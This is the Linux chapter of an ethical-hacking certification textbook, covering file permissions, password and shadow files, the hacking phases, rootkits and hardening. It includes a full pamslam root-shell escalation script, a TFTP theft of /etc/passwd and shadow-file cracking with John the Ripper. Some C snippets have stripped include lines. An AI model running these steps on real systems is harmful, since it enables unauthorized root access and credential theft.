Linux

Linux is an operating system that is based on UNIX. Linux was originally created by Linus Torvalds with help from programmers from around the world. If you're new to Linux, this should serve as an opportunity to get to know the operating system (OS) a little better. The benefits to using Linux are that it is economical, well-designed, and offers good performance. Linux distributions are easily available and can be downloaded onto any system. Linux comes in many flavors, including Red Hat, Debian, Mandrake, SUSE, and so on. Some specialized versions of Linux have been developed for a specific purpose. Some of these include Knoppix, Trinux, Auditor, and so on. The best way to learn Linux is just by using it. That is why a copy of Linux is included on the enclosed CD. You can use the Linux install files on the CD to load Linux onto a system hard drive or make a bootable CD; for more information, check out Appendix B, "Preparing Your System for Knoppix-std." If you are looking for other versions of Linux that have been customized for security work and penetration testing, check the list at www.frozentech.com/content/livecd.php.

Linux is open source, which means that it can be freely distributed and you have the right to modify the source code. Linux is also easy to develop your own programs on. This is one of the reasons that you will see many security tools released on Linux well before they ever make a debut in the Windows world. This section of the Chapter takes a closer look at Linux, reviews some of the basics, looks at some Linux tools, and discusses how Linux is used by hackers as well as how it is hacked.

Linux File Structure

Objective:

Identify the Linux file structure and common directories

The Linux file system is the structure in which all the information on the computer is stored. Files are stored within a hierarchy of directories. Each directory can contain other directories and files. Common directories in the Linux file system can be seen in Figure 5.1.

Figure 5.1. Linux file structure.

Slashes are used to separate directory names in Linux. Physical drives are handled differently than DOS. The /usr directory could be on a separate hard disk, or /mnt might contain a folder named /storage that is actually a drive from another computer.

Some of the more common directories found on a Linux system are described here:

  • / Represents the root directory.
  • /bin Contains common Linux user commands, such as ls, sort, date, and chmod.
  • /dev Contains files representing access points to devices on your systems. These can include floppy disks, hard disks, and CD-ROMs.
  • /etc Contains administrative configuration files, the passwd file, and the shadow file.
  • /home Contains user home directories.
  • /mnt Provides a location for mounting devices, such as CD-ROMs and floppy disks.
  • /sbin Contains administrative commands and daemon processes.
  • /usr Contains user documentation, graphical files, libraries, as well as a variety of other user and administrative commands and files.

Exam Alert

Make sure that you know and understand basic Linux file structure.

Directories and files on a Linux system are set up so that access can be controlled. When you log in to the system, you are identified by a user account. In addition to your user account, you might belong to a group or groups. Therefore, files can have permissions set for a user, a group, or others. For example, Red Hat Linux supports three default groups: super users, system users, and normal users. Access for each of these groups has three options:

  • Read
  • Write
  • Execute

To see the current permissions, owner, and group for a file or directory, type the ls -l command. This will display the contents of the directory you are in with the privileges for the user, group, and all others. For example, the list of a file called demofile and the directory demodir would resemble the following:

drwxr-xr-x

2 mikeg users

32768 Nov 20 00:31 demodir

-rw-r--r--

1 mikeg users

4108 Nov 16 11:21 demofile

The permissions are listed in the first column. The first letter is whether the item is a directory or a file. If the first letter is d, the item is a directory, as in the first item listed previously, demodir. For the file demofile, the first letter is -. The next nine characters denote access and take the following form, rwx|rwx|rwx. The first three list the access rights of the user, so for demodir, the user has read, write, and execute privileges. The next three bits denote the group rights; therefore, the group has read and execute privileges for the demodir folder. Finally, the last three bits specify the access all others have to the demodir folder. In this case, they have read and execute privileges. The third column, mikeg, specifies the owner of the file/directory, and the fourth column, users, is the name of the group for the file/directory. The only one who can modify or delete any file in this directory is the owner mikeg.

The chmod command is used by a file owner or administrator to change the definition of access permissions to a file or set of files. Chmod can be used in symbolic and absolute modes. Symbolic deals with symbols such as rwx, whereas absolute deals with octal values. For each of the three sets of permission on a fileread, write, and executeread is assigned the number 4, write is assigned the number 2, and execute is assigned the number 1. To make sure that permissions are wide open for yourself, the group, and all users, the command would be chmod 777 demofile.

Exam Alert

You need to understand the binary equivalent for file and folder access permissions. As an example, the binary representation of rwxr--r-- would be 744.

 

Linux Basics

Objective:

Understand basic Linux commands

Identify the root user and know its user and group ID

The objective of this section is to review some Linux basics. Although a lot of work can be done from the Linux GUI, you will still need to operate from the Terminal Window or shell. The Terminal Window is similar to the command prompt in Windows. If you log in as root and open a Terminal Window, you should see something similar to this: [root@rh /]#. The # sign is most important here as it denotes that you are root. Root is god in the world of Linux. This means that root has total control of the system and maintains the highest level of privilege. You will want to make sure that you properly execute commands while working as root because unlike Windows, Linux might not offer you prompts or warnings before it executes a critical command. It is important that you know some basic Linux commands and their functions. Some of the basic commands are provided in Table 5.1.

Table 5.1. Linux Commands

Command

Description

cat

Lists the contents of a file

cd

Changes directory

chmod

Changes file and folder rights and ownership

cp

The copy command

history

Shows the history of up to 500 commands

ifconfig

Similar to ipconfig in Windows

kill

Kills a running process by specifying the PID

ls

Lists the contents of a folder

man

Opens manual pages

mv

Command to move file and directories

passwd

The command to change your password

ps

The process status command

pwd

Prints the working directory path

rm

Removes a file

rm -r

Removes a directory and all its contents

Ctrl P

Pauses a program

Ctrl B

Puts the current program into the background

Crtl Z

Puts the current program to sleep

Just as in the world of Microsoft, Linux users must be managed in an organized way. Access for users and system processes are assigned a User ID (UID) and a Group ID (GID). Groups are the logical grouping of users that have similar requirements. This information is contained in the /etc/passwd file. As an ethical hacker, it is critical that you understand the importance of this file. An example is shown here:

[root@mg /root]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
operator:x:11:0:operator:/root:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
john:x:500:500:John:/home/jn:/bin/bash
clement:x:501:501:Clement:/cd/:/bin/csh
betty:x:502:502:Betty:/home/bd:/bin/pop
mike:x:503:503:Mike:/home/mg:/bin/bash

You will notice that root is the first account in the list. Root is always assigned the UID 0 and the GID 0. Other special users and accounts associated with services and daemons are listed after root and have values below 100. Red Hat starts regular users at a UID of 500. Let's take a look at each field and discuss its meaning. Look at the last listing, which is Mike's record, and we will review each field and its meaning. The fields are denoted by the colons.

  1. The username is the first field. Initial capitalization is not used to avoid upper/lowercase confusion.
  2. The second field holds the encrypted password. You might notice that the field is marked by an x in this case; that is because this particular Linux system is using shadow passwords, which are held in /etc/shadow. The shadow file is used to increase security and is located at /etc/shadow. Shadow passwords are discussed more fully later in this Chapter.
  3. The third field is the UID. Mike's UID is 503. Any file Mike owns or creates will have this number associated with it.
  4. The fourth field is the GID. Mike's GID is 503. You will notice that the GID and UID are the same, as will the other users listed in the password file shown previously. This is by design under Red Hat, an approach called user private groups.
  5. The fifth field is the user description. This field holds descriptive information about the user. It can sometimes contain phone numbers, mail stops, or some other contact information. This is not a good idea as it can be reported by the finger utility.
  6. The sixth field is the User's Home Directory. When the user is authenticated, the login program uses this field to define the user's $HOME variable. By default, in all Linux distributions, the user's home directory will be assumed to be /home/username.
  7. The seventh and final field is the User's Login Shell. When the user is authenticated, the login program also sets the users $SHELL variable to this field. By default, in all Linux distributions, a new user's login shell will be set to /bin/bash, the Bourne Again Shell.

Adding users to Linux is a rather straightforward process. Just issue the useradd command. Of all the users, the one requiring the most protection is the root account because it must be secure. Although files such as passwd are world readable, the shadow file is only readable by root. If an attacker can gain access to the root account, he has essentially taken control of the computer from you. For this reason, the root account must be protected at the highest level. This means that a large amount of the time users perform their duties on a Linux computer with an account other than root. However, some duties will require that you run them as root. For those occasions, you will want to use the Substitute User (SU) command. The SU command will allow you to perform duties as a different user than the one you are logged in as. The command is simply su .

Passwords and the Shadow File

Linux requires that user accounts have a password, but by default, it will not prevent you from leaving one set as blank. During installation, Linux gives the user the choice of setting the password encryption standard. Most versions of Linux, such as Red Hat, use MD5 by default. If you choose not to use MD5, you can choose DES, although it limits passwords to eight alphanumeric characters. Linux also includes the /etc/shadow file for additional password security. Take a look at an entry from an /etc/shadow file here:

root:$1$Gjt/eO.e$pKFFRe9QRb4NLvSrJodFy.:0:0:root:/root:/bin/bash

Moving the passwords to the shadow makes it less likely that the encrypted password can be decrypted because only the root user has access to the shadow file. The format of the password file is formatted as follows:

Account_name:Password:Last:Min:Max:Warn:Expire:Disable:Reserved

If you are logged in a root and would like to see the shadow passwords on your computer, use the following command:

more /etc/shadow

Another interesting fact about Linux systems is that the passwords use salts. Salts are needed to add a layer of randomness to the passwords. Because MD5 is a hashing algorithm, this means that if I used "secret" for my password and another user used "secret" for his password, encrypted values would look the same. A salt can be one of 4,096 values and helps further scramble the password. Under Linux, the MD5 password is 32 characters long and begins with $1$. The characters between the second and third $ represent the salt. In the previous example, that value is Gjt/eO.e. Passwords created in this way are considered to be one way. That is, there is no easy way to reverse the process. Figure 5.2 demonstrates how Linux creates this value.

Figure 5.2. Creating a password.

Tip

Because the passwd file is world readable, passwords should be stored in the shadow file.

The shadow file isn't the only way to help guard against attackers who try to bypass the authentication process. There are other more advanced ways to protect resources. Passwords are one of the weakest forms of authentication. There is also something you have (tokens) and something you are (biometrics). If a new authentication scheme is going to be used, there needs to be a way to alert applications to this fact without having to rewrite every piece of code already developed. The answer to this challenge is Pluggable Authentication Modules (PAM). PAM enables a program designed to forgo the worry of the types of authentication that will be performed and concentrate on the application itself. PAM is used by FreeBSD, Linux, Solaris, and others. Its role is to control interaction between the user and authentication. This might be telnet, FTP, logging in to the console, or changing a password. PAM supports stronger authentication schemes, such as Kerberos, S/Key, and RADIUS. The directory that holds the modules specific to PAM is in /etc/pam.d/.

Exam Alert

Understand salts and why they are used.

All this talk of passwords brings up the issue of password security. Just as in the world of Microsoft, Linux also has a host of password cracking tools available. John the Ripper is one of these tools (http://www.openwall.com/John/). It is probably the most well-known, most versatile, and fastest password cracking program around. Best of all, it's free and supports six different password hashing schemes that cover various flavors of UNIX and the Windows LANMan hashes. It can use specialized word lists or password rules based on character type and placement. It runs on more than 12 different operating systems. It comes preinstalled on many Linux distributions. It's included on the Knoppix version of Linux found on the CD in this book. Before you go out and start cracking passwords, spend a few minutes to check out the various options by issuing -./john -h from the command line. You can verify that John works by running it in test mode. It will generate a baseline cracking speed for your system.

[root@mg /root]#./john -test
Benchmarking: Traditional DES [32/32 BS]... DONE
Many salts: 160487 c/s real, 161600 c/s virtual
Only one salt: 144262 c/s real, 146978 c/s virtual

Benchmarking: BSDI DES (x725) [32/32 BS]... DONE
Many salts: 5412 c/s real, 5280 c/s virtual
Only one salt: 5889 c/s real, 5262 c/s virtual

Benchmarking: FreeBSD MD5 [32/32 X2]... DONE
Raw: 3666 c/s real, 3246 c/s virtual

Benchmarking: OpenBSD Blowfish (x32) [32/32]... DONE
Raw: 241 c/s real, 227 c/s virtual

Benchmarking: Kerberos AFS DES [24/32 4K]... DONE
Short: 70438 c/s real, 72263 c/s virtual
Long: 192506 c/s real, 200389 c/s virtual
Benchmarking: NT LM DES [32/32 BS]... DONE
Raw: 1808844 c/s real, 1877553 c/s virtual

Review the results of the FreeBSD MD5 and NT LM DES benchmarks. The cracks per second (c/s) difference between these two is a factor of more than 500, which means that a complete brute-force attack will take more than 500 times longer against password hashes on a FreeBSD system than against a Windows system. Which one of those systems would you rather hold critical data? After all this talk about cracking passwords, you might want to give it a try yourself. If so, do the challenge exercise listed here.

Exam Alert

Test candidates should know how password cracking programs, such as John the Ripper, work.

Challenge

Password protection is important in any platform as is building robust passwords. This challenge will have you create passwords of various complexity and then attempt to crack them. The objective is to see how quickly weak passwords can be broken. You will need a copy of Linux and John the Ripper to perform this exercise. It's suggested that you use the copy of Linux included on the CD with this book. It can be loaded onto a second CD that is self booting. As an alternative, you can also download Knoppix STD from www.knoppix-std.org and install it to a CD.

  1. Boot up the Knoppix STD CD.
  2. Open a terminal window and go to the john directory. Enter cd /etc/john.
  3. Before attempting to crack the existing passwords, enter a few more users to see how fast the passwords can be cracked. Use the adduser command to add three users. Name the three users user1, user2, and user3. Set the password for each user to password, P@ssw0rd, and !P@ssw0rD1. For example, to add the user user1 with the home directory of /home/users/user1, type the following command:

    adduser user1 -d /home/users/user1.
    

    Next set the password. To do so, type the following command:

    passwd username (where username is the username of the new user)
    
  4. After the three users have been added, you will want to execute John. This can be accomplished by typing in ./john/etc/shadow from the command line.
  5. Give it time to see how long it takes for each password to be cracked. Record those times here: User1:_____ User2:_____ User3:_____

Did you notice a correlation between the time it took to crack a password versus the complexity of the password? You should have seen that more complex passwords take longer to recover.

John the Ripper is a wonderful tool for ethical hackers to test password strength; however, it is not designed for illegal activity. Before you use this tool on a production network, make sure that you have written permission from senior management. John the Ripper performs different types of cracks: single mode; dictionary, or wordlist mode, the one performed in this exercise, which applies a dictionary list of passwords for comparison; and brute force or incremental mode, which is the slowest of the three modes and attempts every combination of letters and numbers. John the Ripper is portable for many flavors of UNIX, Linux, and Windows, although it does not have a GUI interface.

 

Compressing, Installing, and Compiling Linux

Objective:

Describe how Linux programs are compiled, loaded, and compressed

In Linux, files are packaged and compressed in various ways. One of the most common compression formats is the Tape Archiving program (Tar). Tar is a standard archive and was originally developed as backup software for UNIX. It collects several files to a single file. It does-n't do file compression; therefore, a second program is needed. A program called gzip is one of the most common file compression programs. Compiling a package from a source tarball is not always a simple procedure. After uncompressing the package, you should search for a file called README, README.INSTALL, README.CONFIGURE, or something similar. This file will usually describe the configuration and installation process. Frequently, the source package includes a script called configure, which you execute to have the package auto detect your computer's installed libraries and configure itself appropriately. If so, the process includes three commands:

Tip

Make sure that you know how to tell if the password has been shadowed.

  • ./configure
  • make
  • make install

Tip

Know the three commands used to compile a program in Linux.

You might want to develop programs yourself, and if so, Linux offers you that capability. Linux comes with the GNU C compiler (GCC). This capability also comes in handy when you download a C program from a security site or would like to check out a piece of exploit code. With Linux, many programs might not be complied for you. The process of compiling is not overly difficult, and a basic program and the steps required to compile it are shown here:

[root@mg /root]#.vi hello.c
#include 
int main(int argc, char ** argv)
{
printf("Hello world!
");
return 0;
}

[root@mg /root]#. gcc -o hello hello.c
[root@mg /root]#. ./hello Hello world!

First, the program code was written; in this case, the vi editor was used. Next, it was compiled with the gcc -o command. Finally, it was run by executing it from the terminal window, ./hello. Notice the ./ in front of the command. This ensures that Linux looks in the local directory for the specified executable.

Hacking Linux

Objective:

Identify how Linux is hacked

Hacking Linux follows the same basic methodology discussed throughout the book. The steps are broadly divided into six phases:

  1. Reconnaissance
  2. Scanning and enumeration
  3. Gaining access
  4. Escalation of privilege
  5. Maintaining access
  6. Cover tracks and placing backdoors

Each of these phases is discussed in more detail so that you better understand how these steps apply to Linux and UNIX systems.

Reconnaissance

Reconnaissance is about passive and active information gathering. This might be scanning the organizational website, reviewing job postings, dumpster diving, social engineering, or using any of the other ways discussed in Chapter 2, "The Technical Foundations of Hacking".

Tip

The same basic techniques used to attack Linux systems can also be used to attack Windows computers. These include passive and active information gathering techniques such as dumpster diving, port scanning, review the website, reading job ads, and so on.

 

Scanning

Scanning finds the hosts and determines what ports and applications they might be running. Here, you can see results that will begin to differentiate Windows and Linux systems. One big clue is open ports, such as 21, 37, 79, 111, and 6000. Those represent programs, such as secure shell (SSH), time, finger, sunrpc, and X11. Port scanners and OS fingerprinting software will be the tools of the trade. As an example look at a scan run on a Linux system:

[root@mg /root]# nmap -O 192.168.13.10

Starting nmap V. 3.93 (www.insecure.org/nmap/)
Interesting ports on unix1 (192.168.13.10):
(The 1529 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
37/tcp open time
79/tcp open finger
111/tcp open sunrpc
139/tcp filtered netbios-ssn
513/tcp open login
1103/tcp open xaudio
2049/tcp open nfs
4045/tcp open lockd
6000/tcp open X11
7100/tcp open font-service
32771/tcp open sometimes-rpc5
32772/tcp open sometimes-rpc7
32773/tcp open sometimes-rpc9
32774/tcp open sometimes-rpc11
32775/tcp open sometimes-rpc13
32776/tcp open sometimes-rpc15
32777/tcp open sometimes-rpc17
Remote operating system guess: Solaris 2.6 - 2.7
Uptime 319.638 days (since Wed May 14 19:38:19 2005)

Nmap run completed -- 1 IP address (1 host up) scanned in 7 seconds

Notice that the ports shown from this scan are much different from what was seen from Windows scans earlier in the book. Ports such as 37, 79, 111, and 32771 are shown as open. You will also want to notice that Nmap has identified the OS as Solaris.

Enumeration

Scanning is just the beginning. After any type of Linux or UNIX system is found, it will still require further probing to determine what's running. Although exploiting the Windows null session might be out of the question, you can still use tools, such as banner grabbing. More importantly, if you think that the target is some flavor of UNIX, you have access to some programs not found in the world of Windows. For example, Finger, rwho, rusers, and Simple Mail Transfer Protocol (SMTP) can all be used to further leverage your knowledge.

Finger is a program thattells you the name associated with an email address. It might also tell you whether users are currently logged on at their system or their most recent logon session and possibly other information, depending on the data that is maintained about users on that computer. Finger originated as part of BSD UNIX.

Rwho and rusers are Remote Procedure Call (RPC) services that can give information about the various users on the system. Running rpcinfo p against the system will allow an attacker to learn the status of rwho and rusers. Rusers depends on rwho daemon. It lists the users logged in to all local machines, in who format (hostname, usernames).

Another potential tool to use for enumeration is Simple Mail Transfer Protocol (SMTP). SMTP can sometimes be helpful in identifying users. Attackers gain this information by using the SMTP vrfy (verify) and expn (expand) commands. These commands can be used to guess users on the system. Simply input names, and if the user exists, you will get back an RFC822 email address with the @ sign. If the user doesn't exist, you'll get back a "user unknown" error message. Although a username is not enough for access, it is half of what's needed to get into most systems.

Gaining Access

After a system has been scanned and enumerated, the next step is to gain access. Attempts to gain access can occur remotely or locally. Remote attacks are primarily carried out through one of four methods.

  • Exploit a process or program.
  • Exploit a Transmission Control Protocol (TCP) or User Datagram Protocol (UDP) listening service.
  • Exploit vulnerabilities in a system that is supplying routing services and providing security between two or more networks.
  • Exploit the user by having him initiate some type of action such as running an email attachment or visiting a hostile website.

Regardless of what method is used, the idea is to get some type of shell of the victim's machine. This can be as mindless as guessing usernames and passwords to more advanced backchannel attacks that rely on the victim's system to push the shell out to the attacker. Let's look at a simple example of exploiting a program. If the victim is found to be running TFTP, you can try to get the victim to hand over critical files.

[root@mg /root]# tftp 192.168.13.50
tftp> get /etc/passwd /root/passwdhack.txt
Received 1015 bytes in 0.0 seconds
tftp> quit
[root@mg /root]#more passwdhack.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
operator:x:11:0:operator:/root:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
john:x:500:500:John:/home/jn:/bin/bash
clement:x:501:501:Clement:/cd/:/bin/csh
betty:x:502:502:Betty:/home/bd:/bin/pop
mike:x:503:503:Mike:/home/mg:/bin/bash

Although you could get the passwd file, you might have noticed that the passwords have been shadowed. This was not a complete success; however, the attacker was able to recover a list of users on the system.

Note

It is important to specify a destination directory when using TFTP to get the remote host's /etc/passwd file. Otherwise, you will overwrite your own /etc/passwd file.

 

Privilege Escalation

Privilege escalation can best be described as the act of leveraging a bug or vulnerability in an application or operating system to gain access to resources, which normally would have been protected from an average user. These are attacks that are usually run locally and are concerned with increasing privilege. The objective is to force an application to perform actions that are running within a higher security context than intended by the designer, and the hacker is granted full local access and control. An example of a local attack is the pamslam vulnerability found in some older versions of Linux:

# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@l0pht.com
cat > _pamslam.c << EOF
#include
#include
#include
void _init(void)
{
 setuid(geteuid());
 system("/bin/sh");
}

EOF
echo -n .
echo -e auth\trequired\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf
echo -n .
gcc -fPIC -o _pamslam.o -c _pamslam.c
echo -n o
ld -shared -o _pamslam.so _pamslam.o
echo -n o
chmod 755 _pamslam.so
echo -n O
rm _pamslam.c
rm _pamslam.o
echo O
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
sleep 1s
rm _pamslam.so
rm _pamslam.conf

 

Maintaining Access and Covering Tracks

Objective:

Explain rootkits and countermeasures

After an attacker is on a Linux system and has made himself root, he will be concerned with maintaining access and covering his tracks. One of the best ways to maintain access is with a rootkit. A rootkit contains a set of tools and replacement executables for many of the operating system's critical components. Once installed, a rootkit can be used to hide evidence of the attacker's presence and to give the attacker backdoor access to the system. Rootkits require root access, but in return they give the attacker complete control of the system. The attacker can come and go at will and hide his activities from the administrator. Rootkits can contain log cleaners that attempt to remove all traces of an attacker's presence from the log files.

Rootkits can be divided into two basic types: traditional, which replace binaries, and loadable kennel modules, which corrupt the kernel. Traditionally, rootkits replaced binaries, such as ls, ifconfig, inetd, killall, login, netstat, passwd, pidof, or ps with trojaned versions. These trojaned versions have been written to hide certain processes or information from the administrators. Rootkits of this type are detectable because of the change in size of the trojaned binaries. Tools, such as MD5sum and Tripwire, can be a big help in uncovering these types of hacks.

The second type of rootkit is the loadable kernel module (LKM). A kernel rootkit is loaded as a driver or kernel extension. Because kernel rootkits corrupt the kernel, they can do basically anything, including detection by many software methods. The best way to avoid these rootkits is simply to recompile the kernel without support for LKMs. Although the use of rootkits is widespread, many administrators still don't know much about them, so some of the most popular ones, such as Flea, T0rm, and Adorm, are discussed in the following list:

  • Flea Once installed, Flea hides the attacker's actions from the administrator, making it easy for the attacker to reenter the system at a later date.
  • T0rm This rootkit is popular with hackers and is notable because it breaks netstat and the ps binary is 31336 bytes. Both these items can give you clues that the rootkit has been installed.
  • Adorm Unlike the previous two rootkits, this one doesn't replace system binaries because it is an LKM rootkit. Adorm intercepts system calls and modifies them as required. Adorm hijacks system calls and creates a wrapper around each call and then sanitizes the output.

Tip

Make sure that you can describe a loadable kernel module and how it is different from a traditional rootkit.

Hackers Are Not the Only Ones to Use Rootkits

Starting in June 2004, Sony started copy protecting some of the company's more popular pop music CDs. One of the copy protection schemes it used is devised by a company called First 4 Internet. This particular piece of copy protection has caused a huge outcry of protest because of the way it installs and hides itself. What has caused this uproar is that the software acts in a way that can be seen as sneaky and intrusive. It wasn't an announcement from Sony that heralded the presence of this software; it was from a user, Mark Russinovich, running RootKitRevealer on one of his own systems. When someone attempts to play a music CD secured with this software, a hidden rootkit type copy protection program is installed. The program hides its tracks, so you cannot uninstall it and you cannot find out what exactly has been installed. Because it is loaded in such a covert manner, it's possible that the software could be used to launch viruses and Trojans developed by others. Because of the stealth install, your antivirus would not be capable of detecting such an infection. As if to make things worse, if you are able to find and remove this software, it disables your CD drive completely and it can no longer be used. If there is any good news here, it's that Linux computers are not affected.

All rootkits allow an attacker to

  • Run packet sniffers covertly to capture passwords.
  • Trojan the login binary to open a backdoor for anytime access.
  • Replace utility programs that can be used to detect the hacker's activity.
  • Provide utilities for installing Trojans with the same attributes as legitimate programs.

Tip

Know the types of rootkits and how they work.

How should an ethical hacker respond if he believes that a system has been compromised and had a rootkit installed? Your first action will most likely be to remove the infected host from the network. An attacker who knows that he has been discovered might decide to trash the system in an attempt to cover his tracks. After being isolated from the network, you can then begin the process of auditing the system and performing some forensic research. Two major tools can be used to audit suspected rootkit attacks:

  • Chkrootkit An excellent tool that can be used to search for signs of a rootkit. It has the capability to examine system binaries for modification.
  • Rootkit Hunter Another tool that scans file and system binaries for known and unknown rootkits.

Finding the rootkit is not the same as seeing justice done. The overwhelming majority of individuals who attack systems go unpunished. The global nature of the Internet makes it hard to track hackers and bring them to justice.

Hardening Linux

Objective:

Describe how Linux is secured

To prevent Linux from being hacked, it is important to harden the system and secure services. Later in the Chapter, we look at tools, such as Nessus and SAINT, that can be used to detect ways that attackers can get into your Linux systems. For now, you need to know that after those vulnerabilities are identified, they will need to be addressed. This can mean patching, removing, or hardening those services. Placing a firewall in front of critical servers is also an important step. Programs, such as ipchains and iptables, can also be used to filter and control traffic. Another easy solution is to remove programs and services if they aren't needed. This is known as the principle of least privilege. Some of the programs and services that are considered nonessential might include

  • Wget A noninteractive tool for fetching data over HTTP/HTTPS and FTP.
  • Finger Lets you retrieve basic information about an Internet user or host.
  • Lynx Text-based browser that supports both HTTP/HTTPS and FTP.
  • Curl A wget-like tool that also supports protocols such as Telnet and gopher.
  • SCP Secure file transfers using the SSH protocol.
  • FTP The command-line FTP client.
  • Telnet The Linux command-line Telnet client.
  • TFTP Trivial FTP.
  • Ping Can also be used as a rather blunt DoS tool.

Turning off unneeded services, removing unnecessary programs, and applying the latest security patches is known as hardening a system. When trying to harden your Linux system, one good source of information is the NSA hardening guidelines; they can be found at www.nsa.gov/snac.

Next up for discussion is chroot. Chroot basically puts a program in a sandbox. The term sandbox refers to the concept of limiting the activity of a program and applying boundaries. More accurately, it redefines the root directory or / for a program or login session. Everything outside the directory you define that chroot can use doesn't exist as far a program is concerned. It effectively jails a process into one part of the file system from which the process cannot escape. Because of this lockdown, it is important to remember that any files a chrooted program needs for proper functionality must be present inside the jail. Chroot is commonly used by programs such as FTP, BIND, mail, and Apache.

TCP Wrapper is another tool that can be used to harden Linux. Wietse Venema developed the TCP Wrapper program to protect computers from hacking attacks. For many years, this was one of the default methods used to harden Linux. It's now being replaced by xinetd.d, which is considered more granular. Network services such as Finger, FTP, Rlogin, Telnet, and TFTP can be configured for TCP Wrapper use. More information about TCP Wrapper follows:

  • TCP Wrapper allows you to specify which hosts are allowed access.
  • TCP Wrapper is activated by having inetd call the TCP Wrapper daemon.
  • TCP Wrapper can be used with TCP or UDP.
  • Two files are used to verify access host.allow and host.deny.

The TCP Wrapper service works by inserting itself between the service and the outside world. You use two files for the management of access control:

  • hosts.allow Lists all hosts with connectivity to the system that can connect to a specific service.
  • hosts.deny Works in the same fashion as most ACLs because if it is not expressly permitted, access is then denied.

Tripwire is another valuable tool that can be used to secure Linux systems. Tripwire is the most commonly used file integrity program. It performs integrity checking by using cryptographic checksums. Tripwire can help you identify if any file tampering has occurred. It is commonly used with IDS systems because it can be used to maintain a snapshot of the system while in a known good state. If rootkits or other changes are made, Tripwire can detect it. Tripwire performs its magic by creating a one-way hash value for files and directories. This hash is stored, and then periodically new scans are performed. The new scanned value is compared against the stored ones. If the two values do not match, a flag is set and an administrator must take action. The Tripwire policy file is twpol.txt and can be found in the /etc/tripwire directory.

Tip

Be able to describe the various tools used to protect Linux such as Tripwire and TCP Wrapper.

Finally, there is logging. Although logging will not prevent an attack, it is a useful tool for determining what happened. Linux will allow you to log systems, applications, and protocols. The output of most logs are kept in the /var/log directory. If you are curious about who has logged in to the system, you can use the lastlog file. The /var/log/lastlog file tracks the last login of user accounts into the system.

Tip

Know that user logs are located at /var/log/.


Automated Assessment Tools

Part I: Exam Preparation

The Business Aspects of Penetration Testing

The Technical Foundations of Hacking

Footprinting and Scanning

Enumeration and System Hacking

Linux and Automated Security Assessment Tools

Trojans and Backdoors

Sniffers, Session Hijacking, and Denial of Service

Web Server Hacking, Web Applications, and Database Attacks

Wireless Technologies, Security, and Attacks

IDS, Firewalls, and Honeypots

Buffer Overflows, Viruses, and Worms

Cryptographic Attacks and Defenses

Physical Security and Social Engineering

Part II: Final Review

Part III: Appendixes

Appendix A. Using the ExamGear Special Edition Software



Certified Ethical Hacker Exam Prep
Certified Ethical Hacker Exam Prep
ISBN: 0789735318
EAN: 2147483647
Year: 2007
Pages: 247
Authors: Michael Gregg

Flylib.com © 2008-2020.
If you may any questions please contact us: flylib@qtcs.net